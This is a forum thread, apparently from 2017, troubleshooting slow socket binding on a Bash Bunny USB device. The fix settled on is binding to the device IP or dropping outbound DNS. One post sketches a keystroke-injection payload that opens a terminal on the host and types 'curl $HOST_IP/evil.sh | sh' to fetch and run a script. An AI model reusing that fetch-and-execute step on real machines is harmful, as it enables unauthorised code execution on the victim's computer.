audibleblink Posted March 15, 2017 Share Posted March 15, 2017 (edited) Has anyone else tried to bind a socket on their BB using something like netcat or python -m SimpleHTTPServer. When connected to the BB through ssh (ecm_ethernet), commands that bind sockets take ~15 seconds to exectue When connected through serial, everything acts as normal. I made a github issue about it, but wasn't sure if that's the right place since that repo is for payloads - https://github.com/hak5/bashbunny-payloads/issues/57 Edited March 15, 2017 by audibleblink Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted March 15, 2017 Share Posted March 15, 2017 Well, if you think of the Bash Bunny as a small Linux machine then it would predominantly be made for Serial shells. Using SSH, it may have to convert its connection to Serial before it can perform such an action. I'm not quite sure though. Do you have to use SSH? Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 15, 2017 Author Share Posted March 15, 2017 If I code something like this LED R python -m SimpleHTTPServer QUACK GUI space Q ENTER Q STRING terminal Q ENTER Q STRING curl $HOST_IP/evil.sh \| sh (with appropriate delays) it fails because the server takes 15 seconds to start anyway. I don't think it has anything to do with ssh. I was just logged in through ssh to develop the payload Quote Link to comment Share on other sites More sharing options...
Dave-ee Jones Posted March 15, 2017 Share Posted March 15, 2017 Well, it is starting a server up...Not exactly the quickest thing to do Just be silly and set the delay to ~15-20 seconds :P Quote Link to comment Share on other sites More sharing options...
Torrey Posted March 15, 2017 Share Posted March 15, 2017 I replied to your issue on github before I realized you had a thread here too. The server is up for me in under 1 second and I made a quick video capture. The only difference that comes to mind is that when I got ICS working on Mac I updated the installed packages on the BB. Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 15, 2017 Author Share Posted March 15, 2017 14 minutes ago, audibleblink said: When connected through serial, everything acts as normal. It's a very quick thing to do. it takes under a second when I run it in serial mode Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 15, 2017 Author Share Posted March 15, 2017 (edited) 5 minutes ago, Torrey said: I replied to your issue on github before I realized you had a thread here too. The server is up for me in under 1 second and I made a quick video capture. The only difference that comes to mind is that when I got ICS working on Mac I updated the installed packages on the BB. Oh thanks man! I guess it's me then. I'm using linux. I can't think of a reason why I wouldn't see the delay in serial. Are you using ECM too? I think I'll try RNDIS just to see if anything changes. edit: nope. same delay with rndis_ethernet Edited March 15, 2017 by audibleblink Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted March 15, 2017 Share Posted March 15, 2017 2 minutes ago, audibleblink said: Oh thanks man! I guess it's me then. I'm using linux. I can't think of a reason why I wouldn't see the delay in serial. Are you using ECM too? I think I'll try RNDIS just to see if anything changes. Works fine for me (C, Python, and Go) via SSH, a payload, or serial. The bind is pretty much instantaneous. Quote Link to comment Share on other sites More sharing options...
Torrey Posted March 15, 2017 Share Posted March 15, 2017 The reason for the delay seems to be that your BB doesn't have internet access. I had the slow response when I disabled the internet sharing. As far as using it as a payload it seems you'd have to add a delay to your script like @Dave-ee Jones mentioned. Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 15, 2017 Author Share Posted March 15, 2017 Right on, thanks Seb. Guess it's just me, I'll close my issue and run a restore. Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 15, 2017 Author Share Posted March 15, 2017 (edited) Hmm, nope. Fresh restore and it still happens. wth? Tried it on another computer too Edited March 15, 2017 by audibleblink Quote Link to comment Share on other sites More sharing options...
Sebkinne Posted March 15, 2017 Share Posted March 15, 2017 Just a heads-up for anyone facing the same issue that missed the discussion on IRC: When the Bash Bunny does not have an internet connection, binding to 0.0.0.0 will be slow as this will usually result in lookups expecting an internet connection. The 'fix' for this is simply binding to the Bash Bunny's IP address directly (172.16.64.1). That way, there is no delay in languages / frameworks that do the actual interface binding under the hood. 1 Quote Link to comment Share on other sites More sharing options...
audibleblink Posted March 16, 2017 Author Share Posted March 16, 2017 (edited) For future readers: I was using python's SimpleHTTPServer to try to serve the local directory. Even when binding the USB's network interface with $HOST_IP, it would still make that request and wait 15 seconds before continuing on. The answer for me was to disallow outgoing requests. This is the code that made the webserver start instantly. iptables -A OUTPUT -p udp --dport 53 -j DROP python -m SimpleHTTPServer 80 Edited March 16, 2017 by audibleblink 1 Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.